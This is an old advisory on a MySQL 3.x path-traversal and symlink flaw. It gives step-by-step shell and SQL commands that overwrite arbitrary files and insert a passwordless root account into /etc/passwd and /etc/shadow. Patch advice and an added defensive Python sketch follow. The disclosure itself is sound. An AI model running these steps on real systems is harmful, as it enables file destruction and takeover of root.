COMMAND
MySQL
SYSTEMS AFFECTED
MySQL 3.20.32a (and others)... 3.23
PROBLEM
Lesha Pavlov found the following. Anybody who has a login and password
for MySQL can use it for a DoS or as a r00t exploit, because mysql accepts
'../blah-blah' as a valid database name, and each table is represented
by 3 files: tablename.ISD, tablename.ISM and tablename.frm. But when
mysqld checks whether a table already exists or not, it checks
_only_ tablename.frm.
Using these "vulnerable features of mysql" to make a big DoS (this will
overwrite any file you wish):
$ cd /var/tmp
$ ln -s /some/file/you/wish/to/overwrite qqq.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table qqq(www int);
\q
$
File /some/file/you/wish/to/overwrite will be overwritten.
Usage as a r00t exploit:
$ cd /var/tmp
$ ln -s /etc/passwd gotcha.ISD
$ ln -s /etc/shadow make_me_r00t.ISD
$ mysql -u user -h localhost -p somepassword '../../tmp'
create table gotcha(qqq varchar(255));
create table make_me_r00t(qqq varchar(255));
insert into gotcha values('\nr00t::0:0:Hacked_Fucked_R00T:/:/bin/sh\n');
insert into make_me_r00t values('\nr00t::1:0:99999:7:-1:-1:\n');
\q
$
You have r00t now!
This DoS/exploit was tested on mysql-3.20.32a, but other versions of
mysql are also vulnerable.
This could affect Red Hat's RPMs for Red Hat PowerTools 6.1 and 6.2,
which used an ancient version of MySQL: it was the only version
of MySQL with a free license (they were allowed to distribute
newer versions, but chose not to because of their license).
The one shipped with Red Hat Linux 7, after MySQL changed their
standard license, is not affected, as it does not run as root.
SOLUTION
* Patch mysql so that when it checks whether a table is present, it
checks all tablename.{ISD,ISM,frm} files, not only tablename.frm.
* Patch mysql to treat database names starting with '..' as
incorrect database names.
* And the main recommendation: do not run mysqld as root!!!
chown the existing database tables to a normal user and run mysqld
as this unprivileged user; that is the better solution!
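As an added example (not part of the advisory and not MySQL's own code), the two code-level fixes above sketched in Python: the name check only accepts a plain identifier, so a database name like '../../tmp' never reaches the filesystem, and the existence check covers all three table files, so a planted qqq.ISD symlink blocks the create instead of being followed. The datadir layout, file names and the victim file are constructed for the demo.

```python
import os, re, tempfile

# Added mitigation sketch (not MySQL's code): strict name check, existence
# check over all of .ISD/.ISM/.frm, and O_EXCL creation, per the advisory.
_SAFE_NAME = re.compile(r"^[A-Za-z0-9_]{1,64}$")  # no '.', '/' or os.sep at all

def is_safe_db_name(name: str) -> bool:
    """A '..' prefix or any path separator cannot pass this charset."""
    return _SAFE_NAME.match(name) is not None

def table_files(datadir: str, db: str, table: str) -> list:
    return [os.path.join(datadir, db, table + s) for s in (".ISD", ".ISM", ".frm")]

def table_exists(datadir: str, db: str, table: str) -> bool:
    """mysqld looked only at tablename.frm; here any of the three files, a
    dangling symlink included (hence lexists), counts as 'already present'."""
    return any(os.path.lexists(p) for p in table_files(datadir, db, table))

def create_table(datadir: str, db: str, table: str) -> list:
    """Create the three table files or raise ValueError; returns their paths."""
    if not (is_safe_db_name(db) and is_safe_db_name(table)):
        raise ValueError("invalid database or table name")
    if table_exists(datadir, db, table):
        raise ValueError("table already exists or a stale file is in the way")
    paths = table_files(datadir, db, table)
    for p in paths:
        # O_EXCL: fail instead of following a symlink planted after the check
        os.close(os.open(p, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o660))
    return paths

def demo() -> dict:
    """Constructed replay of the advisory: a qqq.ISD symlink aimed at a file
    the server must not overwrite. Returns what each check decided."""
    out = {}
    with tempfile.TemporaryDirectory() as root:
        datadir, target = os.path.join(root, "datadir"), os.path.join(root, "victim")
        os.makedirs(os.path.join(datadir, "test"))
        with open(target, "w") as f:
            f.write("original\n")
        os.symlink(target, os.path.join(datadir, "test", "qqq.ISD"))
        out["traversal_rejected"] = not is_safe_db_name("../../tmp")
        try:
            create_table(datadir, "test", "qqq")
            out["symlink_blocked"] = False
        except ValueError:
            out["symlink_blocked"] = True
        with open(target) as f:
            out["target_intact"] = f.read() == "original\n"
        out["clean_create"] = len(create_table(datadir, "test", "www")) == 3
    return out
```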